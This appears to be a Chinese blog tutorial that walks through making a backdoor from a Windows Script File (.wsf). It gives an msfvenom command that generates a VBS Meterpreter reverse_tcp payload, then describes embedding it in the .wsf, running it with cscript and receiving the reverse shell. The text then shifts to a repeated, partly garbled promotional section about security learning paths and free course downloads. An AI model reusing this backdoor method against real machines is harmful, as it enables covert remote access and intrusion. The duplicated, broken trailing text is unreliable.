首先了解wsf是啥语言,可参考文章如下:
https://www.cnblogs.com/vitrox/p/5137441.html |
---|
https://blog.csdn.net/leyvan/article/details/3746683 |
http://book.51cto.com/art/201111/300472.htm |
wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,
Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。
wsf后门思路:
1)学习.wsf脚本格式
2)msf生成vbs
- msf生成vbs插入.wsf脚本格式
4)尝试运行查看是否报错
5)反弹shell
开始制作脚本:
1) .wsf脚本格式
2) msf生成vbs
msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport= EXITFUNC=thread -f vbs--platform win > test.vbs
复制
3) msf生成vbs插入.wsf脚本中
4)尝试运行无查看是否报错:
直接运行无报错
使用cscript.exe (WindowsScript Host引擎),运行无报错:
5)反弹shell
监听:
反弹:
知识补充:
网络安全成长路线图
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
d59b5f63c5e626f914.png)
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!